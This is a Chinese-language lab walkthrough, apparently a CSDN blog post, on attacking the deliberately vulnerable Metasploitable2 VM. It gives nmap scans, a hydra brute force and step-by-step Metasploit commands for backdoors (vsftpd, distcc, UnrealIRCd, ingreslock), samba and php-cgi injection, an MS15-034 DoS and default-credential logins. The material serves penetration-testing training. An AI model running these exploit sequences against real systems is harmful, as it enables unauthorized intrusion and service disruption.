metasploitable2

nmap使用
nmap –sP IP段/掩码 范围内ping通的所有主机,通过抓包只看到发了arp包,还没有找全局域网内所有主机。
nmap -sP 192.168.43.0/24

-PS 让nmap使用SYN包而不是ACK包来对目标主机进行扫描。抓包没有看到syn包,不知道为什么
nmap -sP -PS 192.168.43.0/24 可以比-sP多找到主机

-sV 探测打开端口对应服务的版本信息
nmap -sV -Pn IP 扫描目标IP所有开放端口,列出应用版本
nmap -sV -Pn 192.168.12.149

操作系统检测 -O(O大写)开放端口也能扫到
nmap -O 192.168.12.149

445:samba sysmlink默认配置目录遍历漏洞
smbclient -L //192.168.12.149 回车
可以列出可以mount挂载的目录
在这里插入图片描述

513:rlogin 漏洞
rlogin -l root 192.168.12.149 有漏洞可以远程登录成功。

1524:ingreslock后门漏洞
nmap可以看到后门漏洞
telnet 192.168.12.149 1524 root登录成功

2181:zookeeper未授权访问
echo envi|nc 192.168.12.149 2181 获取靶机信息

3306:mysql空口令
mysql -h 192.168.12.149 -u root
show databases;

hydra -L username.txt -P password.txt -vV -T 5000 ftp://192.168.12.149
爆破密码

msfconsole
匿名登录漏洞
search anonymous 查找匿名漏洞模块
use auxiliary/scanner/ftp/anonymous 使用ftp匿名攻击模块
show options 展示参数
set rhosts 192.168.12.149 设置攻击IP
run 运行
在这里插入图片描述

vsftp漏洞 vsftpd 2.3.4
search backdoor
use exploit/unix/ftp/vsftpd_234_backdoor
show options
set rhost 192.168.12.149
run
进入靶机,root权限

smtp简单邮件传输协议 25端口
telnet 192.168.12.149 25
vrfy user 返回码252 用户存在 返回码550用户不存在

ms15-034内存溢出漏洞
search ms15-034
use auxiliary/scanner/http/ms15_034_http_sys_memory_dump
show options
set rhosts 192.168.12.149
run
在这里插入图片描述

200返回码存在漏洞,400不存在漏洞
攻击
search ms15-034
use auxiliary/dos/http/ms15_034_ulonglongadd
show options
set rhosts 192.168.12.149
run

php-cgi漏洞
search php-cgi
use exploit/multi/http/php_cgi_arg_injection
show options
set rhosts 192.168.12.149
run
进入靶机
shell
python -c ‘import pty;pty.spawn(“/bin/bash”)’
进入bash

nfs漏洞
search nfs
use auxiliary/scanner/nfs/nfsmount
show options
set rhosts 192.168.12.149
run
在这里插入图片描述

/路径,目录下都有远程挂载权限。
mount 192.168.12.149:/home/msfadmin /root/nfs -o nolock 挂载
mount -l可以查看挂载情况
在这里插入图片描述

139:samba rpc shell注入漏洞
search port:139 根据端口搜索
exploit/multi/samba/usermap_script
show options
set rhosts 192.168.12.149
run
进入靶机root权限

1099:Java-rmi server命令执行漏洞
search java-rmi
use auxiliary/scanner/misc/java_rmi_server
show options
set rhosts 192.168.12.149
run
可以看到存在漏洞
use exploit/multi/misc/java_rmi_server
show options
set rhosts 192.168.12.149
run
攻击成功

5432:postgres弱口令
search postgre
use auxiliary/scanner/postgres/postgres_login
show options
set rhosts 192.168.12.149
run
LOGIN SUCCESSFUL: postgres:postgres@template1
得到用户名密码
远程登录
psql -h 192.168.12.149 -U postgres
select pg_ls_dir(‘./’);可以执行命令

3632:distcc后门
search distcc
use exploit/unix/misc/distcc_exec
show options
set rhosts 192.168.12.149
run

5900:vnc未授权访问
use auxiliary/scanner/vnc/vnc_login
show options
set rhosts 192.168.12.149
run
[+] 192.168.12.149:5900 - LOGIN SUCCESSFUL: :password
得到vnc密码 vncviewer 192.168.12.149输入密码进入

6667- unrealRCD IRC守护进程后门
search unrealRCD
use exploit/unix/irc/unreal_ircd_3281_backdoor
set rhosts 192.168.12.149
run
直接进入

8180:tomcat 默认弱口令
search tomcat
use auxiliary/scanner/http/tomcat_mgr_login
show options
set rhosts 192.168.12.149
set rport 8180
run
[+] 192.168.12.149:8180 - LOGIN SUCCESSFUL: tomcat:tomcat
登录tomcat后台管理, tomcat manager中输用户名密码可以上次war包。
在这里插入图片描述

  • 0
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 3
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值